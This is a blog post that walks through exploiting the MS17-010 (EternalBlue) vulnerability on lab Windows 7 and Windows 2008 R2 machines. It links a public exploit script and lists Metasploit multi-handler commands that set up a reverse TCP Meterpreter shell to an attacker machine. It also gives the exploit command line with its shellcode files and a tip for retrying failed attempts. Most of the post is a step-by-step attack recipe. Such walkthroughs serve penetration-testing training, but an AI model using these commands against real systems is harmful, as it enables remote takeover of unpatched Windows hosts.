MS17-010 Vulnerability - EternalBlue exploit using a binary payload and python script on Windows 7 and Windows 2008 R2 targets

In this video we exploit the MS17-010 Vulnerability (EternalBlue) on Windows 7 and Windows 2008 R2 targets. We use the shellcode (binary payloads) that we previously generated, in addition to a python script and Metasploit Framework.

Please check my previous post on generating the shellcode:
Generating shellcode - using msfvenom to generate a binary payload

We also need Worawit's eternalblue7_exploit.py python script, which can be downloaded from the following Github URL:
https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a

Before starting the actual target exploitation, we need to configure the multi handler exploit in Metasploit Framework. The multi handler exploit is running in listening mode and is necessary in order to establish the Meterpreter session between the attacker machine (Kali Linux OS) and the target machine (Windows OS). It is essential to configure the multi handler with the same Metasploit payload, LHOST and LPORT values that were previously used for generating the shellcode with the msfvenom utility (For more details see above the link for the "Generating shellcode" post). 

The following Metasploit commands were used:
use exploit/multi/handler
This command selects the multi handler exploit module.
set payload windows/x64/meterpreter/reverse_tcp
This command selects the Meterpreter reverse_tcp payload
set EXITFUNC thread
This command configures the payload to use the Thread exit method, by calling ExitThread().
set lhost <Kali_Linux_IP>
This command sets the listening IP address (192.168.254.142)
set lport 4444
This command sets the listening port value.
show options
This command displays the basic options available for the selected module.
show advanced
This command displays the advanced options available for the selected module.
set ExitOnSession false
This command will allow the multi handler exploit to continue to run in listening mode, even if an established Meterpreter session is closed.
exploit -j
This command will launch the multi handler exploit and run it in the context of a job.
sessions -l
This command displays information about the active sessions.
sessions -i <Session_number>
This command starts interaction with the specified session.
sysinfo
This Meterpreter command displays information about the target system (after performing successful exploitation and after a Meterpreter session was established)
getuid
This Meterpreter command displays the Meterpreter user on the target.
exit
This Meterpreter command closes the current Meterpreter session.
jobs
This command displays information about the active jobs running in the background.
jobs -K
This command terminates all running jobs.

The command used for running the EternalBlue exploit script is:
python eternalblue7_exploit.py <Target_IP> <shellcode_file> [numGroomConn]
where:
<Target_IP> - can be the IP address for the test Windows 7 machine (192.168.254.70) or for the test Windows 2008 R2 machine (192.168.254.99)
<shellcode_file> - can be sc_x64.bin (the binary payload without NOP sled) or sc_x64_100n.bin (the binary payload with NOP sled)
[numGroomConn] - is an optional parameter which by default has the value 13. It is used in the EternalBlue exploit script for the buffer overflow attack. If the exploit fails, but the target does not crash, then try increasing the "numGroomConn" value.



Comments

Post a comment

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

Generating shellcode - using msfvenom to generate a binary payload

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux